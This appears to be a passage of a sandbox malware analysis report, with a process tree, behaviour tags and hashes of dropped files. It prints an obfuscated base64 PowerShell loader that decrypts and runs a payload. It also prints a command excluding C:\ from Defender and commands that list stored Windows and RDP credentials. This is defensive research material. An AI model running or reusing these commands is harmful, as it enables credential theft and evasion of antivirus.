                                                                                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                  • Drops startup file
                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                  PID:7608
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
                                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                    PID:8436
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10413470101\81bb507991.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10413470101\81bb507991.exe"
                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                              • Identifies Wine through registry keys
                                                                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                              PID:10508
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10413480101\PQPYAYJJ.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10413480101\PQPYAYJJ.exe"
                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                PID:8300
                                                                                                                                                                                                                                                • C:\Users\Admin\Abspawnhlp.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\Abspawnhlp.exe"
                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                    PID:8560
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                        PID:8700
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10413490101\captcha.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10413490101\captcha.exe"
                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                      PID:9116
                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                        "cmd.exe" /c "dxdiag /t > \"C:\Users\Admin\AppData\Local\Temp\dxdiag_temp_3864585960.txt\""
                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                          PID:9068
                                                                                                                                                                                                                                                        • C:\Windows\system32\net.exe
                                                                                                                                                                                                                                                          "net" statistics workstation
                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                            PID:9696
                                                                                                                                                                                                                                                            • C:\Windows\system32\net1.exe
                                                                                                                                                                                                                                                              C:\Windows\system32\net1 statistics workstation
                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                PID:9752
                                                                                                                                                                                                                                                            • C:\Windows\system32\vaultcmd.exe
                                                                                                                                                                                                                                                              "vaultcmd" /list
                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                PID:9948
                                                                                                                                                                                                                                                              • C:\Windows\system32\cmdkey.exe
                                                                                                                                                                                                                                                                "cmdkey" /list
                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                  PID:11492
                                                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  "powershell" -Command " $entries = cmdkey /list | Select-String \"TERMSRV\" -Context 0,3 foreach ($entry in $entries) { $target = ($entry -split \"target=\")[1].Trim() $ip = $target -replace \"TERMSRV/\", \"\" $userLine = $entry.Context.PostContext | Select-String \"User\" $user = if ($userLine) { ($userLine -split \":\")[1].Trim() } else { \"N/A\" } Write-Output \"Server: $ip | Username: $user\" } "
                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                  PID:9636
                                                                                                                                                                                                                                                                  • C:\Windows\system32\cmdkey.exe
                                                                                                                                                                                                                                                                    "C:\Windows\system32\cmdkey.exe" /list
                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                      PID:10392
                                                                                                                                                                                                                                                                  • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                    "tasklist"
                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                    • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                    PID:10072
                                                                                                                                                                                                                                                                  • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                    "tasklist" /FO CSV /NH
                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                    • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                    PID:10172
                                                                                                                                                                                                                                                                  • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                    "tasklist"
                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                    • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                    PID:10184
                                                                                                                                                                                                                                                                  • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                    "tasklist"
                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                    • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                    PID:10412
                                                                                                                                                                                                                                                                  • C:\Windows\system32\certutil.exe
                                                                                                                                                                                                                                                                    "certutil" -store My
                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                      PID:10584
                                                                                                                                                                                                                                                                    • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                      "tasklist"
                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                      • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                      PID:10568
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10413500101\7IIl2eE.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10413500101\7IIl2eE.exe"
                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                      PID:10288
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\CMD.exe
                                                                                                                                                                                                                                                                        "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                          PID:10468
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                              • Identifies Wine through registry keys
                                                                                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                              PID:2944
                                                                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                PID:1556
                                                                                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                  PID:6096
                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                    PID:4624
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                    • Identifies Wine through registry keys
                                                                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                    PID:3980
                                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                      PID:4400
                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:4712
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3500 -ip 3500
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                          PID:7368
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                          • Identifies Wine through registry keys
                                                                                                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                          PID:8060
                                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\{6933409c-556c-44b7-9ee7-3107cb88c22e}\ab0586cb-62cb-46a3-b62a-7725723fe744.cmd"1!
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                            PID:5700

                                                                                                                                                                                                                                                                          Network

                                                                                                                                                                                                                                                                          MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                          Replay Monitor

                                                                                                                                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                                                                                                                                          Downloads

                                                                                                                                                                                                                                                                          • C:\Users\Admin\Abspawnhlp.exe

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            27KB

                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            5b8fb06983be9063ef128fa5aee80b3a

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            c065a0ee84eb1fd646ea213bca20543306d7c9e1

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            ab5b956eca5ce83bf763d5f952316f17ba771adfd5cafd8ca9e262de61de4b4e

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            868cfbf9dd0a4ea9ececb290fa149959416ee2720c09e5bb8722cd1863626794afc2d5770e9244ba4e64b8e88c76e22e13af37aa42d745e1dbff4104258c8da2

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            649B

                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            f88c29d253de45547ef65430d98b4819

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            3ee9fd7d1b81a670812c938d2c60a9aa25a425ad

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            29dcbe62d3ae9f5bf8158df1f2522a8ec5c8836dc787cc01098e5100e1c77803

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            339a7a508af01650dda7a9ce3d6751b71e72e858e0d3dc81ace67389106e598271f32ece0a7273d231c8ce496931f3d4d1866c760333a4b06eab41cbf58247c3

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            2B

                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            d751713988987e9331980363e24189ce

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            9KB

                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            f6533f66084072dac0666dd17c767263

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            f7df62b666d1be1a0d17f081dbaf0a4ac4536214

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            dabd0ca92216e0c860721040ea8b5a11bf880c320b1c307b3844e81cfa83b20a

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            39d706dcbb487dc707ab2c0f397fe4a35d72eea733b44f144c041c29429b40463c762b7b8dd91653714826c968b298e9f9c268e8ea56f959033b14885df61101

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            13KB

                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            90f97b89d6484a880327ecedf87574aa

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            3839dce714e615d3e9174a802314c15404092d76

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            f410d3be8022340690ff148fdd9179eca59724ce036a8a1f5246b826b78f6c25

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            b6590c3acb14625851653f8dfe0defc7ea1ec4fd9c60bcc130c8b3ab2acfc87d12dbf0a3667156deb82bbf38708eee30642314fbef6cef0254e71aa8195c3f00

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nmmhkkegccagdldgiimedpiccmgmieda\CURRENT

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            16B

                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            46295cac801e5d4857d09837238a6394

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nmmhkkegccagdldgiimedpiccmgmieda\MANIFEST-000001

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            41B

                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            5af87dfd673ba2115e2fcf5cfdb727ab

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            d5b5bbf396dc291274584ef71f444f420b6056f1

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            80KB

                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            ef6d1e50d4cf68d3477cb7615598acd6

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            30e9a25e7cb000aa0a8a8c5ffa6877ae5893dc76

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            5922290a957f5e7e8c6e324c35c3837f365794d6824d7531a79ee2ead00cd4cc

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            b999517cd450fa03783326dbe2ec51d9ecb236d6adbdf0c24259a3a37e7e6ca1187050cf02dac0ebb4f095f6d75de068e53aea5535d80c434610afec32386744

